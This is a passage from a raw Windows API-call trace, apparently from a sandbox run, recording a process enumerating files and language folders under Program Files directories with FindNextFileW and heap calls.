lpMem=0x4579fa8 | out: hHeap=0x6a0000) returned 1 [0157.573] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85c57278, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xb269cdea, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb269cdea, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x79bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrenclm.dat", cAlternateFileName="")) returned 1 [0157.573] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6f6f90, Size=0x4000) returned 0x4579fa8 [0157.573] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa20, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipscat.xml", cAlternateFileName="")) returned 1 [0157.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.577] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076a026, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0157.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.577] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076a7a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0157.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.577] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076afd8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LanguageModel", cAlternateFileName="LANGUA~1")) returned 1 [0157.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.579] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076b52b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0157.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.579] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076ba6e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0157.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.579] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a4376e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1f30e81, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1f30e81, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x19f200, dwReserved0=0x0, dwReserved1=0x0, cFileName="micaut.dll", cAlternateFileName="")) returned 1 [0157.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.580] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076c75d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0157.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.582] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080d57c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0157.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.582] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080d988, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0157.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.582] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080ddb8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0157.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.583] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080e0f5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0157.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.584] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e38953f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e38953f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e38953f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2b600, dwReserved0=0x0, dwReserved1=0x0, cFileName="rtscom.dll", cAlternateFileName="")) returned 1 [0157.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.585] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe46546cb, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe46546cb, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xb3200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShapeCollector.exe", cAlternateFileName="")) returned 1 [0157.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.587] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080ec25, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0157.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.588] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c7ae2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-Latn-RS", cAlternateFileName="SR-LAT~1")) returned 1 [0157.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.590] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c820e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0157.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.591] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d14d081, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe467a929, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe467a929, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="TabIpsps.dll", cAlternateFileName="")) returned 1 [0157.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.591] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1aad768, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1aad768, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x109400, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipRes.dll", cAlternateFileName="")) returned 1 [0157.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.592] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c8ed8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0157.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.594] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c93df, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0157.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.594] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c97fd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0157.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.594] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c97fd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0157.594] FindClose (in: hFindFile=0x728348 | out: hFindFile=0x728348) returned 1 [0157.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0157.594] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa098a4c6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71143a45, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSInfo", cAlternateFileName="")) returned 1 [0157.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.596] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x463aec8d, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0x63793f1, ftLastAccessTime.dwHighDateTime=0x1d2fa0a, ftLastWriteTime.dwLowDateTime=0x463aec8d, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x5a600, dwReserved0=0x0, dwReserved1=0x0, cFileName="msinfo32.exe", cAlternateFileName="")) returned 1 [0157.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0157.598] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd99442a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd9f60362, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd9f60362, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="OFFICE16", cAlternateFileName="")) returned 1 [0157.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4561fa0 | out: hHeap=0x6a0000) returned 1 [0157.608] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xd9f60362, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xa0a26299, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xda982389, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office Setup Controller", cAlternateFileName="OFFICE~1")) returned 0 [0157.608] FindClose (in: hFindFile=0x727f48 | out: hFindFile=0x727f48) returned 1 [0157.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.608] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd99442a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd99442a7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd99442a7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0157.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.612] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4accd6e1, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4accd6e1, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4accd6e1, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Source Engine", cAlternateFileName="SOURCE~1")) returned 1 [0157.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.613] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b5538f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a412e70, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0157.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.627] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b56882, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TextConv", cAlternateFileName="")) returned 1 [0157.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4561fa0 | out: hHeap=0x6a0000) returned 1 [0157.627] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b5787e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0157.627] FindClose (in: hFindFile=0x7280c8 | out: hFindFile=0x7280c8) returned 1 [0157.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.627] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b57d42, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Triedit", cAlternateFileName="")) returned 1 [0157.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4561fa0 | out: hHeap=0x6a0000) returned 1 [0157.631] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b58502, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0157.631] FindClose (in: hFindFile=0x727d88 | out: hFindFile=0x727d88) returned 1 [0157.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.959] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xbcd0fab8, ftCreationTime.dwHighDateTime=0x1d327b7, ftLastAccessTime.dwLowDateTime=0xa0b594b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x2ce22546, ftLastWriteTime.dwHighDateTime=0x1d327be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VC", cAlternateFileName="")) returned 1 [0157.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.960] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b59a78, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71169cb5, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VGX", cAlternateFileName="")) returned 1 [0157.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.960] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ecb94e, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4ae972f5, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VSTO", cAlternateFileName="")) returned 1 [0157.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0157.960] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, 